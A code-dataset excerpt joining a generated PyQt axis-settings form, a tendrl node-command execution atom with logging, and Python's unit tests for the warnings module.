self.autoRadio.setObjectName(_fromUtf8("autoRadio"))
self.gridLayout.addWidget(self.autoRadio, 2, 0, 1, 2)
self.manualRadio = QtGui.QRadioButton(Form)
self.manualRadio.setObjectName(_fromUtf8("manualRadio"))
self.gridLayout.addWidget(self.manualRadio, 1, 0, 1, 2)
self.minText = QtGui.QLineEdit(Form)
self.minText.setObjectName(_fromUtf8("minText"))
self.gridLayout.addWidget(self.minText, 1, 2, 1, 1)
self.maxText = QtGui.QLineEdit(Form)
self.maxText.setObjectName(_fromUtf8("maxText"))
self.gridLayout.addWidget(self.maxText, 1, 3, 1, 1)
self.invertCheck = QtGui.QCheckBox(Form)
self.invertCheck.setObjectName(_fromUtf8("invertCheck"))
self.gridLayout.addWidget(self.invertCheck, 5, 0, 1, 4)
self.mouseCheck = QtGui.QCheckBox(Form)
self.mouseCheck.setChecked(True)
self.mouseCheck.setObjectName(_fromUtf8("mouseCheck"))
self.gridLayout.addWidget(self.mouseCheck, 6, 0, 1, 4)
self.visibleOnlyCheck = QtGui.QCheckBox(Form)
self.visibleOnlyCheck.setObjectName(_fromUtf8("visibleOnlyCheck"))
self.gridLayout.addWidget(self.visibleOnlyCheck, 3, 2, 1, 2)
self.autoPanCheck = QtGui.QCheckBox(Form)
self.autoPanCheck.setObjectName(_fromUtf8("autoPanCheck"))
self.gridLayout.addWidget(self.autoPanCheck, 4, 2, 1, 2)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(_translate("Form", "Form", None))
self.label.setText(_translate("Form", "Link Axis:", None))
self.linkCombo.setToolTip(_translate("Form", "<html><head/><body><p>Links this axis with another view. When linked, both views will display the same data range.</p></body></html>", None))
self.autoPercentSpin.setToolTip(_translate("Form", "<html><head/><body><p>Percent of data to be visible when auto-scaling. It may be useful to decrease this value for data with spiky noise.</p></body></html>", None))
self.autoPercentSpin.setSuffix(_translate("Form", "%", None))
self.autoRadio.setToolTip(_translate("Form", "<html><head/><body><p>Automatically resize this axis whenever the displayed data is changed.</p></body></html>", None))
self.autoRadio.setText(_translate("Form", "Auto", None))
self.manualRadio.setToolTip(_translate("Form", "<html><head/><body><p>Set the range for this axis manually. This disables automatic scaling. </p></body></html>", None))
self.manualRadio.setText(_translate("Form", "Manual", None))
self.minText.setToolTip(_translate("Form", "<html><head/><body><p>Minimum value to display for this axis.</p></body></html>", None))
self.minText.setText(_translate("Form", "0", None))
self.maxText.setToolTip(_translate("Form", "<html><head/><body><p>Maximum value to display for this axis.</p></body></html>", None))
self.maxText.setText(_translate("Form", "0", None))
self.invertCheck.setToolTip(_translate("Form", "<html><head/><body><p>Inverts the display of this axis. (+y points downward instead of upward)</p></body></html>", None))
self.invertCheck.setText(_translate("Form", "Invert Axis", None))
self.mouseCheck.setToolTip(_translate("Form", "<html><head/><body><p>Enables mouse interaction (panning, scaling) for this axis.</p></body></html>", None))
self.mouseCheck.setText(_translate("Form", "Mouse Enabled", None))
self.visibleOnlyCheck.setToolTip(_translate("Form", "<html><head/><body><p>When checked, the axis will only auto-scale to data that is visible along the orthogonal axis.</p></body></html>", None))
self.visibleOnlyCheck.setText(_translate("Form", "Visible Data Only", None))
self.autoPanCheck.setToolTip(_translate("Form", "<html><head/><body><p>When checked, the axis will automatically pan to center on the current data, but the scale along this axis will not change.</p></body></html>", None))
self.autoPanCheck.setText(_translate("Form", "Auto Pan Only", None))
| gpl-2.0 |
r0h4n/commons | tendrl/commons/objects/node/atoms/cmd/__init__.py | 2 | 1493 | from tendrl.commons.objects import AtomExecutionFailedError
from tendrl.commons.objects import BaseAtom
from tendrl.commons.utils.cmd_utils import Command
from tendrl.commons.utils import log_utils as logger
class Cmd(BaseAtom):
def run(self):
cmd = self.parameters.get("Node.cmd_str")
logger.log(
"info",
NS.publisher_id,
{"message": "Executing %s on node %s" % (
cmd,
self.parameters.get("fqdn"))},
job_id=self.parameters['job_id'],
flow_id=self.parameters['flow_id']
)
out, err, rc = Command(cmd).run()
if not err and rc == 0:
logger.log(
"info",
NS.publisher_id,
{"message": "Successfully executed %s on node %s" % (
cmd,
self.parameters.get("fqdn"))},
job_id=self.parameters['job_id'],
flow_id=self.parameters['flow_id']
)
return True
else:
logger.log(
"error",
NS.publisher_id,
{"message": "Failed to execute %s on node %s."
"Error %s" % (
cmd,
self.parameters.get("fqdn"),
err)},
job_id=self.parameters['job_id'],
flow_id=self.parameters['flow_id']
)
raise AtomExecutionFailedError(err)
| lgpl-2.1 |
dennis-sheil/commandergenius | project/jni/python/src/Lib/test/test_warnings.py | 51 | 27088 | from contextlib import contextmanager
import linecache
import os
import StringIO
import sys
import unittest
from test import test_support
import warning_tests
import warnings as original_warnings
sys.modules['_warnings'] = 0
del sys.modules['warnings']
import warnings as py_warnings
del sys.modules['_warnings']
del sys.modules['warnings']
import warnings as c_warnings
sys.modules['warnings'] = original_warnings
@contextmanager
def warnings_state(module):
"""Use a specific warnings implementation in warning_tests."""
global __warningregistry__
for to_clear in (sys, warning_tests):
try:
to_clear.__warningregistry__.clear()
except AttributeError:
pass
try:
__warningregistry__.clear()
except NameError:
pass
original_warnings = warning_tests.warnings
try:
warning_tests.warnings = module
yield
finally:
warning_tests.warnings = original_warnings
class BaseTest(unittest.TestCase):
"""Basic bookkeeping required for testing."""
def setUp(self):
# The __warningregistry__ needs to be in a pristine state for tests
# to work properly.
if '__warningregistry__' in globals():
del globals()['__warningregistry__']
if hasattr(warning_tests, '__warningregistry__'):
del warning_tests.__warningregistry__
if hasattr(sys, '__warningregistry__'):
del sys.__warningregistry__
# The 'warnings' module must be explicitly set so that the proper
# interaction between _warnings and 'warnings' can be controlled.
sys.modules['warnings'] = self.module
super(BaseTest, self).setUp()
def tearDown(self):
sys.modules['warnings'] = original_warnings
super(BaseTest, self).tearDown()
class FilterTests(object):
"""Testing the filtering functionality."""
def test_error(self):
with original_warnings.catch_warnings(module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("error", category=UserWarning)
self.assertRaises(UserWarning, self.module.warn,
"FilterTests.test_error")
def test_ignore(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("ignore", category=UserWarning)
self.module.warn("FilterTests.test_ignore", UserWarning)
self.assertEquals(len(w), 0)
def test_always(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("always", category=UserWarning)
message = "FilterTests.test_always"
self.module.warn(message, UserWarning)
self.assert_(message, w[-1].message)
self.module.warn(message, UserWarning)
self.assert_(w[-1].message, message)
def test_default(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("default", category=UserWarning)
message = UserWarning("FilterTests.test_default")
for x in xrange(2):
self.module.warn(message, UserWarning)
if x == 0:
self.assertEquals(w[-1].message, message)
del w[:]
elif x == 1:
self.assertEquals(len(w), 0)
else:
raise ValueError("loop variant unhandled")
def test_module(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("module", category=UserWarning)
message = UserWarning("FilterTests.test_module")
self.module.warn(message, UserWarning)
self.assertEquals(w[-1].message, message)
del w[:]
self.module.warn(message, UserWarning)
self.assertEquals(len(w), 0)
def test_once(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("once", category=UserWarning)
message = UserWarning("FilterTests.test_once")
self.module.warn_explicit(message, UserWarning, "test_warnings.py",
42)
self.assertEquals(w[-1].message, message)
del w[:]
self.module.warn_explicit(message, UserWarning, "test_warnings.py",
13)
self.assertEquals(len(w), 0)
self.module.warn_explicit(message, UserWarning, "test_warnings2.py",
42)
self.assertEquals(len(w), 0)
def test_inheritance(self):
with original_warnings.catch_warnings(module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("error", category=Warning)
self.assertRaises(UserWarning, self.module.warn,
"FilterTests.test_inheritance", UserWarning)
def test_ordering(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("ignore", category=UserWarning)
self.module.filterwarnings("error", category=UserWarning,
append=True)
del w[:]
try:
self.module.warn("FilterTests.test_ordering", UserWarning)
except UserWarning:
self.fail("order handling for actions failed")
self.assertEquals(len(w), 0)
def test_filterwarnings(self):
# Test filterwarnings().
# Implicitly also tests resetwarnings().
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.filterwarnings("error", "", Warning, "", 0)
self.assertRaises(UserWarning, self.module.warn, 'convert to error')
self.module.resetwarnings()
text = 'handle normally'
self.module.warn(text)
self.assertEqual(str(w[-1].message), text)
self.assert_(w[-1].category is UserWarning)
self.module.filterwarnings("ignore", "", Warning, "", 0)
text = 'filtered out'
self.module.warn(text)
self.assertNotEqual(str(w[-1].message), text)
self.module.resetwarnings()
self.module.filterwarnings("error", "hex*", Warning, "", 0)
self.assertRaises(UserWarning, self.module.warn, 'hex/oct')
text = 'nonmatching text'
self.module.warn(text)
self.assertEqual(str(w[-1].message), text)
self.assert_(w[-1].category is UserWarning)
class CFilterTests(BaseTest, FilterTests):
module = c_warnings
class PyFilterTests(BaseTest, FilterTests):
module = py_warnings
class WarnTests(unittest.TestCase):
"""Test warnings.warn() and warnings.warn_explicit()."""
def test_message(self):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
for i in range(4):
text = 'multi %d' %i # Different text on each call.
self.module.warn(text)
self.assertEqual(str(w[-1].message), text)
self.assert_(w[-1].category is UserWarning)
def test_filename(self):
with warnings_state(self.module):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
warning_tests.inner("spam1")
self.assertEqual(os.path.basename(w[-1].filename),
"warning_tests.py")
warning_tests.outer("spam2")
self.assertEqual(os.path.basename(w[-1].filename),
"warning_tests.py")
def test_stacklevel(self):
# Test stacklevel argument
# make sure all messages are different, so the warning won't be skipped
with warnings_state(self.module):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
warning_tests.inner("spam3", stacklevel=1)
self.assertEqual(os.path.basename(w[-1].filename),
"warning_tests.py")
warning_tests.outer("spam4", stacklevel=1)
self.assertEqual(os.path.basename(w[-1].filename),
"warning_tests.py")
warning_tests.inner("spam5", stacklevel=2)
self.assertEqual(os.path.basename(w[-1].filename),
"test_warnings.py")
warning_tests.outer("spam6", stacklevel=2)
self.assertEqual(os.path.basename(w[-1].filename),
"warning_tests.py")
warning_tests.outer("spam6.5", stacklevel=3)
self.assertEqual(os.path.basename(w[-1].filename),
"test_warnings.py")
warning_tests.inner("spam7", stacklevel=9999)
self.assertEqual(os.path.basename(w[-1].filename),
"sys")
def test_missing_filename_not_main(self):
# If __file__ is not specified and __main__ is not the module name,
# then __file__ should be set to the module name.
filename = warning_tests.__file__
try:
del warning_tests.__file__
with warnings_state(self.module):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
warning_tests.inner("spam8", stacklevel=1)
self.assertEqual(w[-1].filename, warning_tests.__name__)
finally:
warning_tests.__file__ = filename
def test_missing_filename_main_with_argv(self):
# If __file__ is not specified and the caller is __main__ and sys.argv
# exists, then use sys.argv[0] as the file.
if not hasattr(sys, 'argv'):
return
filename = warning_tests.__file__
module_name = warning_tests.__name__
try:
del warning_tests.__file__
warning_tests.__name__ = '__main__'
with warnings_state(self.module):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
warning_tests.inner('spam9', stacklevel=1)
self.assertEqual(w[-1].filename, sys.argv[0])
finally:
warning_tests.__file__ = filename
warning_tests.__name__ = module_name
def test_missing_filename_main_without_argv(self):
# If __file__ is not specified, the caller is __main__, and sys.argv
# is not set, then '__main__' is the file name.
filename = warning_tests.__file__
module_name = warning_tests.__name__
argv = sys.argv
try:
del warning_tests.__file__
warning_tests.__name__ = '__main__'
del sys.argv
with warnings_state(self.module):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
warning_tests.inner('spam10', stacklevel=1)
self.assertEqual(w[-1].filename, '__main__')
finally:
warning_tests.__file__ = filename
warning_tests.__name__ = module_name
sys.argv = argv
def test_missing_filename_main_with_argv_empty_string(self):
# If __file__ is not specified, the caller is __main__, and sys.argv[0]
# is the empty string, then '__main__ is the file name.
# Tests issue 2743.
file_name = warning_tests.__file__
module_name = warning_tests.__name__
argv = sys.argv
try:
del warning_tests.__file__
warning_tests.__name__ = '__main__'
sys.argv = ['']
with warnings_state(self.module):
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
warning_tests.inner('spam11', stacklevel=1)
self.assertEqual(w[-1].filename, '__main__')
finally:
warning_tests.__file__ = file_name
warning_tests.__name__ = module_name
sys.argv = argv
def test_warn_explicit_type_errors(self):
# warn_explicit() shoud error out gracefully if it is given objects
# of the wrong types.
# lineno is expected to be an integer.
self.assertRaises(TypeError, self.module.warn_explicit,
None, UserWarning, None, None)
# Either 'message' needs to be an instance of Warning or 'category'
# needs to be a subclass.
self.assertRaises(TypeError, self.module.warn_explicit,
None, None, None, 1)
# 'registry' must be a dict or None.
self.assertRaises((TypeError, AttributeError),
self.module.warn_explicit,
None, Warning, None, 1, registry=42)
class CWarnTests(BaseTest, WarnTests):
module = c_warnings
class PyWarnTests(BaseTest, WarnTests):
module = py_warnings
class WCmdLineTests(unittest.TestCase):
def test_improper_input(self):
# Uses the private _setoption() function to test the parsing
# of command-line warning arguments
with original_warnings.catch_warnings(module=self.module):
self.assertRaises(self.module._OptionError,
self.module._setoption, '1:2:3:4:5:6')
self.assertRaises(self.module._OptionError,
self.module._setoption, 'bogus::Warning')
self.assertRaises(self.module._OptionError,
self.module._setoption, 'ignore:2::4:-5')
self.module._setoption('error::Warning::0')
self.assertRaises(UserWarning, self.module.warn, 'convert to error')
class CWCmdLineTests(BaseTest, WCmdLineTests):
module = c_warnings
class PyWCmdLineTests(BaseTest, WCmdLineTests):
module = py_warnings
class _WarningsTests(BaseTest):
"""Tests specific to the _warnings module."""
module = c_warnings
def test_filter(self):
# Everything should function even if 'filters' is not in warnings.
with original_warnings.catch_warnings(module=self.module) as w:
self.module.filterwarnings("error", "", Warning, "", 0)
self.assertRaises(UserWarning, self.module.warn,
'convert to error')
del self.module.filters
self.assertRaises(UserWarning, self.module.warn,
'convert to error')
def test_onceregistry(self):
# Replacing or removing the onceregistry should be okay.
global __warningregistry__
message = UserWarning('onceregistry test')
try:
original_registry = self.module.onceregistry
__warningregistry__ = {}
with original_warnings.catch_warnings(record=True,
module=self.module) as w:
self.module.resetwarnings()
self.module.filterwarnings("once", category=UserWarning)
self.module.warn_explicit(message, UserWarning, "file", 42)
self.failUnlessEqual(w[-1].message, message)
del w[:]
self.module.warn_explicit(message, UserWarning, "file", 42)
self.assertEquals(len(w), 0)
# Test the resetting of onceregistry.
self.module.onceregistry = {}
__warningregistry__ = {}
self.module.warn('onceregistry test')
self.failUnlessEqual(w[-1].message.args, message.args)
# Removal of onceregistry is okay.
del w[:]
del self.module.onceregistry
__warningregistry__ = {}
self.module.warn_explicit(message, UserWarning, "file", 42)
self.assertEquals(len(w), 0)
finally:
self.module.onceregistry = original_registry
def test_showwarning_missing(self):
# Test that showwarning() missing is okay.
text = 'del showwarning test'
with original_warnings.catch_warnings(module=self.module):
self.module.filterwarnings("always", category=UserWarning)
del self.module.showwarning
with test_support.captured_output('stderr') as stream:
self.module.warn(text)
result = stream.getvalue()
self.failUnless(text in result)
def test_showwarning_not_callable(self):
self.module.filterwarnings("always", category=UserWarning)
old_showwarning = self.module.showwarning
self.module.showwarning = 23
try:
self.assertRaises(TypeError, self.module.warn, "Warning!")
finally:
self.module.showwarning = old_showwarning
self.module.resetwarnings()
def test_show_warning_output(self):
# With showarning() missing, make sure that output is okay.
text = 'test show_warning'
with original_warnings.catch_warnings(module=self.module):
self.module.filterwarnings("always", category=UserWarning)
del self.module.showwarning
with test_support.captured_output('stderr') as stream:
warning_tests.inner(text)
result = stream.getvalue()
self.failUnlessEqual(result.count('\n'), 2,
"Too many newlines in %r" % result)
first_line, second_line = result.split('\n', 1)
expected_file = os.path.splitext(warning_tests.__file__)[0] + '.py'
first_line_parts = first_line.rsplit(':', 3)
path, line, warning_class, message = first_line_parts
line = int(line)
self.failUnlessEqual(expected_file, path)
self.failUnlessEqual(warning_class, ' ' + UserWarning.__name__)
self.failUnlessEqual(message, ' ' + text)
expected_line = ' ' + linecache.getline(path, line).strip() + '\n'
assert expected_line
self.failUnlessEqual(second_line, expected_line)
class WarningsDisplayTests(unittest.TestCase):
"""Test the displaying of warnings and the ability to overload functions
related to displaying warnings."""
def test_formatwarning(self):
message = "msg"
category = Warning
file_name = os.path.splitext(warning_tests.__file__)[0] + '.py'
line_num = 3
file_line = linecache.getline(file_name, line_num).strip()
format = "%s:%s: %s: %s\n %s\n"
expect = format % (file_name, line_num, category.__name__, message,
file_line)
self.failUnlessEqual(expect, self.module.formatwarning(message,
category, file_name, line_num))
# Test the 'line' argument.
file_line += " for the win!"
expect = format % (file_name, line_num, category.__name__, message,
file_line)
self.failUnlessEqual(expect, self.module.formatwarning(message,
category, file_name, line_num, file_line))
def test_showwarning(self):
file_name = os.path.splitext(warning_tests.__file__)[0] + '.py'
line_num = 3
expected_file_line = linecache.getline(file_name, line_num).strip()
message = 'msg'
category = Warning
file_object = StringIO.StringIO()
expect = self.module.formatwarning(message, category, file_name,
line_num)
self.module.showwarning(message, category, file_name, line_num,
file_object)
self.failUnlessEqual(file_object.getvalue(), expect)
# Test 'line' argument.
expected_file_line += "for the win!"
expect = self.module.formatwarning(message, category, file_name,
line_num, expected_file_line)
file_object = StringIO.StringIO()
self.module.showwarning(message, category, file_name, line_num,
file_object, expected_file_line)
self.failUnlessEqual(expect, file_object.getvalue())
class CWarningsDisplayTests(BaseTest, WarningsDisplayTests):
module = c_warnings
class PyWarningsDisplayTests(BaseTest, WarningsDisplayTests):
module = py_warnings
class CatchWarningTests(BaseTest):
"""Test catch_warnings()."""
def test_catch_warnings_restore(self):
wmod = self.module
orig_filters = wmod.filters
orig_showwarning = wmod.showwarning
# Ensure both showwarning and filters are restored when recording
with wmod.catch_warnings(module=wmod, record=True):
wmod.filters = wmod.showwarning = object()
self.assert_(wmod.filters is orig_filters)
self.assert_(wmod.showwarning is orig_showwarning)
# Same test, but with recording disabled
with wmod.catch_warnings(module=wmod, record=False):
wmod.filters = wmod.showwarning = object()
self.assert_(wmod.filters is orig_filters)
self.assert_(wmod.showwarning is orig_showwarning)
def test_catch_warnings_recording(self):
wmod = self.module
# Ensure warnings are recorded when requested
with wmod.catch_warnings(module=wmod, record=True) as w:
self.assertEqual(w, [])
self.assert_(type(w) is list)
wmod.simplefilter("always")
wmod.warn("foo")
self.assertEqual(str(w[-1].message), "foo")
wmod.warn("bar")
self.assertEqual(str(w[-1].message), "bar")
self.assertEqual(str(w[0].message), "foo")
self.assertEqual(str(w[1].message), "bar")
del w[:]
self.assertEqual(w, [])
# Ensure warnings are not recorded when not requested
orig_showwarning = wmod.showwarning
with wmod.catch_warnings(module=wmod, record=False) as w:
self.assert_(w is None)
self.assert_(wmod.showwarning is orig_showwarning)
def test_catch_warnings_reentry_guard(self):
wmod = self.module
# Ensure catch_warnings is protected against incorrect usage
x = wmod.catch_warnings(module=wmod, record=True)
self.assertRaises(RuntimeError, x.__exit__)
with x:
self.assertRaises(RuntimeError, x.__enter__)
# Same test, but with recording disabled
x = wmod.catch_warnings(module=wmod, record=False)
self.assertRaises(RuntimeError, x.__exit__)
with x:
self.assertRaises(RuntimeError, x.__enter__)
def test_catch_warnings_defaults(self):
wmod = self.module
orig_filters = wmod.filters
orig_showwarning = wmod.showwarning
# Ensure default behaviour is not to record warnings
with wmod.catch_warnings(module=wmod) as w:
self.assert_(w is None)
self.assert_(wmod.showwarning is orig_showwarning)
self.assert_(wmod.filters is not orig_filters)
self.assert_(wmod.filters is orig_filters)
if wmod is sys.modules['warnings']:
# Ensure the default module is this one
with wmod.catch_warnings() as w:
self.assert_(w is None)
self.assert_(wmod.showwarning is orig_showwarning)
self.assert_(wmod.filters is not orig_filters)
self.assert_(wmod.filters is orig_filters)
def test_check_warnings(self):
# Explicit tests for the test_support convenience wrapper
wmod = self.module
if wmod is sys.modules['warnings']:
with test_support.check_warnings() as w:
self.assertEqual(w.warnings, [])
wmod.simplefilter("always")
wmod.warn("foo")
self.assertEqual(str(w.message), "foo")
wmod.warn("bar")
self.assertEqual(str(w.message), "bar")
self.assertEqual(str(w.warnings[0].message), "foo")
self.assertEqual(str(w.warnings[1].message), "bar")
w.reset()
self.assertEqual(w.warnings, [])
class CCatchWarningTests(CatchWarningTests):
module = c_warnings
class PyCatchWarningTests(CatchWarningTests):
module = py_warnings
class ShowwarningDeprecationTests(BaseTest):
"""Test the deprecation of the old warnings.showwarning() API works."""
@staticmethod
def bad_showwarning(message, category, filename, lineno, file=None):
pass
@staticmethod
def ok_showwarning(*args):
pass
def test_deprecation(self):
# message, category, filename, lineno[, file[, line]]
args = ("message", UserWarning, "file name", 42)
with original_warnings.catch_warnings(module=self.module):
self.module.filterwarnings("error", category=DeprecationWarning)
self.module.showwarning = self.bad_showwarning
self.assertRaises(DeprecationWarning, self.module.warn_explicit,
*args)
self.module.showwarning = self.ok_showwarning
try:
self.module.warn_explicit(*args)
except DeprecationWarning as exc:
self.fail('showwarning(*args) should not trigger a '
'DeprecationWarning')
class CShowwarningDeprecationTests(ShowwarningDeprecationTests):
module = c_warnings
class PyShowwarningDeprecationTests(ShowwarningDeprecationTests):
module = py_warnings
def test_main():
py_warnings.onceregistry.clear()
c_warnings.onceregistry.clear()
test_support.run_unittest(CFilterTests, PyFilterTests,
CWarnTests, PyWarnTests,
CWCmdLineTests, PyWCmdLineTests,
_WarningsTests,
CWarningsDisplayTests, PyWarningsDisplayTests,
CCatchWarningTests, PyCatchWarningTests,
CShowwarningDeprecationTests,
PyShowwarningDeprecationTests,
)
if __name__ == "__main__":
test_main()
| lgpl-2.1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.